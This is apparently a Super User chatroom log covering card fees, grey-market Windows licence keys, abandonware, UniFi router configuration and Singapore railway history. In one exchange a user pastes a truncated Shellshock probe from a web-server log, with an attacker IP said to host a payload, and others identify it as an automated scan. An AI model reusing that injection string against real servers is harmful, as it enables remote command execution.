00:15
@JourneymanGeek actually. is that a fairly new thing? I noticed pt-br appearing on daiso packaging about a year ago
Seems to be
00:53
@DavidPostill Yeah, but for Japanese it's #1
The Japanese diaspora, and its individual members known as nikkei (日系) or nikkeijin (日系人), are the Japanese emigrants from Japan and their descendants that reside in a foreign country. Emigration from Japan first happened and was recorded as early as the 12th century to the Philippines, but did not become a mass phenomenon until the Meiji period, when Japanese began to go to the Philippines and the Americas. There was also significant emigration to the territories of the Empire of Japan during the colonial period; however, most emigrants repatriated to Japan after the end of World War II in Asia...
There's more Japanese in Brazil than in the US
01:17
le sigh
So, there's a game I want to buy on the Google Play Store, and it costs $2.99. I have $2.95 in store credit from Google Opinion Rewards. I'm very, very hesitant to charge 4¢ to my debit card as the merchant fee would certainly exceed the amount charged.
By Ysmir, four cents!
01:34
They charge for using a debit card?
Over here it is usually free because it is cheaper for the shops when they do not have to deal with as much physical money.
@bwDraco heh. I grab a 30 dollar card every year or so
@Hennes I'm talking about what the merchant pays for processing the transaction.
It's really silly to charge pennies to plastic.
It seems silly. Merchent over here usually have a sign "pinnen, voor elk bedrag"
Which means a debit card for any amount. Even for 5 cents
Heck, "pinnen" (debit) is so common over here that most people did not have a credit card unless they travelled abroad.
Generally, if I'm paying in person, I'd prefer to use cash unless the purchase is at least $10. Many stores will not accept cards (credit or debit) for purchases less than a certain minimum, often $10.
Problem is, this is an online purchase, so cash is obviously not an option.
Bob
Bob
@bwDraco meh, that's not your problem. and I'm pretty sure Google doesn't care.
01:42
I could just opt to pay for the entire purchase using my debit card rather than the store credit, but it feels rather wasteful to leave the store credit on the table.
Bob
Bob
anyway, it's usually a percentage rather than a fixed fee for MC/Visa transactions
(I still have some eight months before it expires)
Ah, we used to have thatm, 10 or 20 years back. $0.25 guilder surcharche for 'pinnen' onder 2.50 guilder.
I cannot remember the last time I saw it. Likely decades ago
Bob
Bob
@bwDraco You're overthinking it. If Google is happy to let you pay $0.04 by card, then just do it.
They won't charge you extra.
It's not your responsibility to care about this.
A.t.m. I good a VISA gold card (for abroad or internet shopping)>
PIN or cash for everything else.

We (dutch) did very good with promoting debit cards.
We also did very bad in exporting or system to neighbouring countries. So our cards are often incompatible. :(
meanwhile: AAAAAAAAAAAAAAAARRRRRRRRRRRRRRRGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHH!
Server 2012 R2 is not intuitive
Bob
Bob
01:46
@Hennes ha, we use a mix here, but leaning more towards credit. which usually comes with more protection for the consumer.
Bought a licence. Playing with it in a VM and with other VMs as clients.
Trying to set up WSUS
Bob
Bob
that, and EFTPOS never got contactless and requires a PIN so is a bit of a pain
@Hennes ...bought a licence? do they actually sell them now?
last I checked you had to go through some VL/SA stuff
More protection from credit: aye. Ditto.
But I think I have used 'PIN' (debit) since the 1980's. As did everyone)
@Bob Ebayed a license.
Bob
Bob
@Hennes oh. sounds mildly dodgy :P
I did not find a place at MS to check the key, though it works.
I got a very dodge download link for an ISO, which I completely ignored.
Bob
Bob
01:47
@Hennes curious, how much did it cost?
Eur 19.50
Bob
Bob
I know there's people reselling MSDN and VL keys for something like $30 ... but technically against the ToS
Not several hundred. So dodgy was expected
Good enough for a home lab to play with and with learning things.
NOT something I would want for production
Bob
Bob
@Hennes there was a MS tool to check what distribution channel a key belongs to
URL ?
Bob
Bob
01:49
it's a real pain to install though cause you need to install SQL Server to use it
@Hennes one min, gotta dig it up again
I had it installed in a VM somewhere
Too be honest, it looked dodgy. But I did get a legal (well, ms verified and working) win 10 CoA for Eur 30.
and not Eur 130+
Bob
Bob
@Hennes yea, that's actually a legitimate use of MSDN keys :P
crap. where did I put my VMs
Mine are in the default place for VMware workstation 12. Wherever that is.
tya
downloaded
Bob
Bob
ahhh
@Hennes old VAMT 2.0 is the one there. new one is distributed as part of the ADK for Windows 10
I think
yea I found my copy. the ADK version is 3.1
I seem to have `windows(R) ProsessionalN edition"
Weird, I thought I had windows 10, not windows R
Bob
Bob
@Hennes FYI it does send the key to MS in case you care
@Hennes ^ That's VAMT 3.1
that win10 key is actually a (legal, mine) MSDN key. comes up as retail though
I seem to have to installations of offic 2016.
One legal, one grace period version
Bob
Bob
02:00
you can add keys instead of just checking the current system
Windows(R), ServerDatacenter edition, Retail, Licenced, Guinuine
I must admid I am somewhat surprised

Anyway 03:21 local. Sleep!

Is it just me or do all Australian girls smell the same?
yes
yo guys did someone just try to hack me
let me type this out
"GET / HTTP/1.0" 301 194 "-" "() { :;}; /bin/bash -c ...
02:49
@Hennes it's 6% more expensive here for the stores.
Card owners pay usually $15/month for the card company + taxes
@Bob?
You're vulpine, you use your sense of smell to identify people right?
"The internet on a disc! Surf easy and quick with no need for an ISP! Take the internet with you wherever you go - it fits in your pocket!"
@Isaac Very suspicious. Very probably a bot scanning for random vulnerabilities.
But I know nothing about security, the people on Information Security do
03:27
@ThatBrazilianGuy yea... i was in the middle of configuring nginx when I saw it come through. It ultimately linked to 188.119.151.104/unx and 188.119.151.104/unix
it only happened after the baidu bot came through... odd
@TOWMN aww
Bob
Bob
@Hennes I'm surprised there's a retail licence for it :P
@Isaac that looks like shellshock
yea probably a random scan as @ThatBrazilianGuy said. just ignore it as long as you're up to date
it was patched a while ago
@TOWMN uh. let's go with that. I'm not usually in a position to sniff test random girls though...
Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system. Stéphane Chazelas contacted Bash's maintainer, Chet Ramey, on 12 September 2014 telling Ramey about his discovery of the original bug, which he called "Bashdoor". Working together...

05:30
@Bob But how do you tell one person from another when they all smell the same?
Perhaps foxes have better eyesight than cats, cats pretty much sniff anything and everything to figure out what it is
@TOWMN cats are small creatures....
@JourneymanGeek Very much awww

When it's faster to remote desktop to your machine in Europe and open a web page there than it is to just open it in your local browser over the same connection...
Because of screwed up throttling limiting your connection to your online banking page to 25kbps...

@Burgi Do you have any experience with Movable Type?
@TOWMN I WANT A FOX I WANT A FOX I WANT A FOX
@TOWMN why do they throttle your speed to such a low speed?

Also CIA
Now now. They listen to everyone
@tereško actually, least in theory, CIA only does foreign intelligence.
local intelligence is under the FBI
@JourneymanGeek that's how it was intended originally, yes
@Hennes Mine still works fine in the UK (nearly 2 years after I moved back - I still have cash in my NL bank account).
08:11
NSA even listens to those who don't like to be listened. NSA wants to listen everything.

Oh, great. Another question in which I feel the OP isn't telling me the whole truth: superuser.com/questions/1187865/basic-powershell-script
You must include the complete script if you expect a proper answer. Please edit the question. — DavidPostill 4 mins ago
user226528
@DavidPostill One of his comments allegedly has the full script. But, it is all wrong.
user226528
11:31
And the line he mentions in his question is different.
that's annoying. I'm trying to find a game from years ago. Can't seem to find it on steam or GOG
user226528
@JourneymanGeek What game?
mageslayer
I remember playing the demo and loving it as a pup
@FleetCommand I noticed.
user226528
@JourneymanGeek Well, I personally think downloading a game that is not sold anywhere falls within fair use. (In other words, you are not damaging the author's financial interests.) So, try Googling "MageSlayer download".
11:38
@FleetCommand that's besides the point
user226528
How so?
(cause googleing the game totally points you at abandonware sites)
user226528
You are implying something is wrong with that?
hmm
I'd prefer to avoid downloading software from random sites.
@FleetCommand Many of those sites are virus infested downloads.
user226528
11:40
Does your country not have fair use laws?
Besides the point ;p
user226528
I see. At least, I think so.
but I'd rather pay some small token amount for an official release without having to dig up ISOs or really old cds where possible, since I'd rather not run software from random locations
@FleetCommand His country canes you for chewing gum :)
user226528
I have no qualms about sandboxing and running software from random locations.
11:42
I mean, its an old enough game that I could run it on a VM, assuming it even works
I don't even know if it'll run on a modern machine
(and if GOG or steam sold it, I know it will)
user226528
I remember playing Act of War: Direct Action on a VM. My admin friends wanted to burn me for blasphemy!
I'm fine with VMs
Raven software is still around? \o/
user226528
It seems so
user226528
It's a subsidiary of Activision.
Yeah, they've always been a second tier dev, but one of the better ones
user226528
11:53
One of the better ones? It seems you know a lot of game developers.
\o/ HNQ answer :)
@FleetCommand I'm a gamer. Someone semi casual, but aware of gaming history ;)
@DavidPostill \o/
user226528
\o/ is the evil version of LOL?

How can I generate colored text like 🇭?
11:58
It's not colored for me
It's black in colour.
^^ Try mobile chat.
user226528
@JourneymanGeek They even have MageSlayer on their website. Maybe you can contact them and ask for a copy.
@FleetCommand eh. Maybe
user226528
12:05
This might help
user226528
That website gives you the codepoint for other colored emoji too.
@FleetCommand oh! That's emoji. Thanks!
@FleetCommand \o/ - Cheer "Yay, yay."

@DavidPostill Oh, I see. It is the head of a person with arms in the air.
@FleetCommand Yes. And *\o/* is a cheerleader (not that I'm one of those) :)

Jesus fucking christ, the Ubiquiti people really have the shittiest kind of documentation on this planet. "Oh, you just need to change that in the config.properties file!" Oh, great, how about you tell me where to find it? "Oh, it's in the UniFi base directory and then a couple of folders down!" Oh, fucking awesome, how about telling me where the base directory is?
How does it take 4 Google searches to track down this file?
'Consultant friendly documentation'
The file config.properties is used for advanced configurations. By default, there is no such a file, a user has to create this file in order to use it. The config.properties file is used to define site-wide parameters for the UniFi controller hence it is placed under each [UniFi base]/data/sites/the_site directory.
that one?
1 search :/
obviously i may of had some clues from you :D
your google fu is weak old man
13:04
man peter theil is awesome
> Oh, fucking awesome, how about telling me where the base directory is?
Yes, that one, the one I found several times as well. Thanks :P
And I also don't care about the base directory when you install the Controller on OSX or Windows
I want the directory on a CloudKey, which apparently was /var/lib/unifi at some point, but no more
@OliverSalzburg If only there was a website where you could ask your own questions and post your own answers so things were easier to find cause companies suck at documentation ;p
It currently appears as if it is /srv/unifi
@JourneymanGeek That's the key, you post the questions and the answers :P
@OliverSalzburg for the next time/guy
And I will post about it, once I have all the information ;)
13:15
cause this sorta thing happens just often enough that you forget ;p
Otherwise I won't have it next time :P
I think I'm closing in. But my site directory name is default even though I renamed my site and previously read material suggests that should change the folder name as well
So this router comes with a setting that completely fucks any VOIP communication and you can't disable it through the Web UI, as it is apparently super advanced
And when you disable it, it gets re-enabled on device reboot
Unless you create that file on your controller, so that it is written to the router during provisioning
So much for buying a cool new technology where you do everything in the browser
@OliverSalzburg heh, I'm debating replacing my main router with something DIY in future
though probably not as powerful as the unifis when it comes to APs
@JourneymanGeek I really like the UniFi equipment in general. This experience is a stark contrast to the usual usability wonderland they sell you though
The APs are the best part of their line
@OliverSalzburg the SF crowd tend to like them and meraki a fair bit
Best AP I ever had hands down
That doesn't say much though ;D
my current network hardware seems to be a bit overworked
@JourneymanGeek What are you running on?
@OliverSalzburg asus RT N56U as a primary
dlink DIR615 as a secondary
I want one of these aliexpress.com/item/… ;p
I also have a extender
(Big apartment, odd deadzone on the other side)
oh, and a switch
I recently got rid of my entire complicated network setup and now I only use a FritzBox from my provider and one of the UniFi UAC Pro APs
13:25
lol
Was very worth it. Everything is better now
that's vaguely what I'd love to do!
but ironically I have more hardware than money
This AP covers the whole house and then some
One of our employees lives a couple houses across from me. He has better reception on my WiFi than his own :P
We bought the asus to replace a WRT54GL that finally died.
Hah, I ran one of those before as well!
13:27
for er... a maximum of 5 PCs and 3 phones at once I guess.
unless I pull out one of the spares for reasons
That "Current version 2006" or something label in the web UI started to concern me at some point ;P
oh, I was fine with that
it died of old age, and I figured I'd try to do something at least a little modern and dual band
Yeah, because who will break through your 3 layers of routing at home, right? :D
oh, there's only one layer of routing
Ah, because that's what I had in my mind ;D
13:28
just a mix of homeplug, an extender, a second router as an AP ...
besides, its @Bob who had the network designed by one Mr Rube Goldburg Esq
Homeplug is LAN over power cable?
yup
I use it to get a connection into my room
If you have nothing else, they are a marvel
lol
When I move out, ethernet in the apartment is a bit of a priority
One of the mistakes I made when I moved in was, I asked for the main internet hookup to be placed near my office. Which seemed smart at the time, but it soon became clear that a central location is more optimal for that spot
Bob
Bob
13:31
@JourneymanGeek :(
As I tend to switch how I use my rooms from time to time and that would have cut down on recabling effort :P
Now I have CAT lines running all over the floor
@OliverSalzburg we made the same mistake
There's a great pet joke in there...
We currently have 0 computers in the room a that's got ethernet cable, from my dad's office space...
and the ONT is next to the TV in another room for some reason
and...
@JourneymanGeek Exactly :D Right now, the hookup is in the bedroom :P
13:34
@Rahul2001 as in a printing press?
@OliverSalzburg I'd just go "hook up all the bedrooms" and have the main hookup where the optical point is
@Burgi I resisted making a gutenburg joke
(and maybe the kitchen, shhhh)
@JourneymanGeek i'm totally confused
@Burgi the kitchen comment was for @OliverSalzburg
@Burgi gutenburg invented the printing press in the west. Also, @Rahul2001 means the blog platform
i know
i'm just confused as to why @Rahul2001 is asking me about it
OH!
is it a blogging platform?
13:38
the major downside is that it looks like it isn't free
@Burgi Yes, blogging platform
@Burgi There is a version licensed under MIT
Jeff Atwood and John Gruber both use it.
with obscure platforms like that you may struggle to find good help articles
13:53
Hmm, so I have this equipment that all talks to a central controller so that I can configure everything easily from a central location. Yay. Now I'm dumping the configuration of one device, which I modified with settings not available through the central configuration, and tell the controller "Hey, ignore whatever is set up in the central configuration, just use this dump"
Is it just me or does that sound like really shitty?
Ah, it's not just me, that's why you're not supposed to do that :P
I tend to skip through documentation until I find the parts written in fixed-width
._.
On one hand, terrible question
On the other, its sitting at +16
superuser.com/questions/1187666/… I mean, what's the practical purpose of knowing that?
Gives you an edge and some xp over others who don't I guess.

Hmm. So I created my updated configuration file and rebooted the router to ensure it all works. And, what do I see? It works! The feature is still disabled! Great. So I go back to my configuration and see that I placed it in the wrong folder... O__o
I hate it when that happens :(
the wording from my landlord is a little odd but it sounds like there is no lift

Eh, in one direction
I currently have 3 construction sites I can see out of my window
That's what they call a "striving neighborhood" on the market
I think I have that UniFi problem down: community.ubnt.com/t5/UniFi-Routing-Switching/…
@OliverSalzburg eh, one's water pipes, one's temporary storage for a historic structure they need to temporarily move. the third is a hospital
Oh, and a bus terminal + carpark
@JourneymanGeek Temporarily moving a history structure? That sounds interesting
14:46
Yeah
Tanjong Pagar railway station (Malay: Stesen Keretapi Tanjong Pagar; Chinese: 丹戎巴葛火车总站; Tamil: தஞ்சோங் பகார் ரயில் நிலையம்), also called Singapore railway station (Malay: Stesen Keretapi Singapura; Chinese: 新加坡火车站; Tamil: சிங்கப்பூர் ரயில் நிலையம்) or Keppel Road railway station, is a former railway station located at 30 Keppel Road in Singapore. The station was the southern terminus of the network operated by Keretapi Tanah Melayu (KTM), the main railway operator in Malaysia, until 30 June 2011 when the station ceased operations with relocation of the KTM station to Woodlands Train Checkpoint...
They're moving the platforms for the station, building a modern metro station under that, then moving them back

@JourneymanGeek Wow
I don't think the railway station in my town has a Wikipedia article :P
(yeah, it should be pretty easy to work out roughly where I live from there. Just wander around the neighbourhood looking for my dog ._.)

Obviously, I already have Google Maps open
;p
@OliverSalzburg lots of fun international weirdness and its one of the two historic railway stations here
Bukit Timah Railway Station was a railway station (now a conserved recreational building) and crossing loop in Singapore, owned by Keretapi Tanah Melayu (KTM), the main railway operator in Malaysia. It opened on the dismantled Tank Road mainline in 1903, was rebuilt on the current Singapore–Johor Bahru KTM Intercity mainline in 1932, until the Jurong Line shut down and it was a crossing loop station in the late 1940s until closure. The station was a freight interchange for the now defunct Jurong Line from 1965 to the early 1990s. On 1 July 2011 the line closed following a historic land-swap agreement...
my home town was on the route of the first ever intercity railway

A quick question for the SU veterans: is it generally accepted practice to utilize Wikipedia as a definitive source?
@djsmiley2k China
中国
@Run5k Linking to Wikipedia without taking exactly what it says and putting it into your answer is bad, because the page might get vandalized or its quality may decrease later
@Run5k Only if you can't find something better
16:58
if you find useful information on Wikipedia that looks correct and you can't find any other sources to contradict it, and especially if the wikipedia text matches with what's said in a source and doesn't say [citation needed], you're probably good
but again, don't just say read wikipedia https://en.wikipedia.org/wiki/...
It's generally pretty good for computing related topics though.
take the actual text you need from there, and it's best if the text has a citation
if the citation is really good, you might just use the citation itself as your link instead of wikipedia
